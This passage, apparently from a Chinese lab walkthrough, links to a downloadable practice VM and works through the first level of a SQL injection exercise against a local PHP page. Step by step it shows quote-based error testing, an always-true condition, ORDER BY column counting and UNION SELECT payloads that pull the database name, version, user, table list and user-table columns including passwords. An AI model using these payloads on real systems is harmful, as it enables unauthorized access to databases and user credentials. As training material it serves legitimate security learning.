虚拟机下载路径:
链接:https://pan.baidu.com/s/19234CirAiVf3H820uWWNeg
提取码:7jfs
- 第一关:很简单的一个注入
使用firefox 可以使用一个叫hackbar的插件,方便注入语句的测试
1.提交 ' 报错,可能存在注入点
还是一个字符型的注入漏洞
测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1'
2.提交 1' or 1='1 会显示出所有信息
测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' or 1='1
3. 使用order by 语句可以猜解这个数据表有多少个字段,目测就是4个了,当然有可能不是select * from tables_name:
order by 1
order by 2
order by 3 ······· 这个例子在order by 1--4 都是能够正确回显,直到order by 5 会出现报错,如图:
即这个表含有4个字段
该例子使用的测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' or 1=1 order by 5-- -
4. 使用联合查询 union select 出现显示位
测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,4-- -
此时也可以顺带把数据库的版本号,用户,和当前的数据库名字给查出
测试语句 http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,database(),version(),user()#
5.查表和列名
表名都显示出来了,有comment,flag,good,user 4个表
测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()-- -
显示出了user表的列名:uid,uname,pwd,bill
测试语句:http://172.27.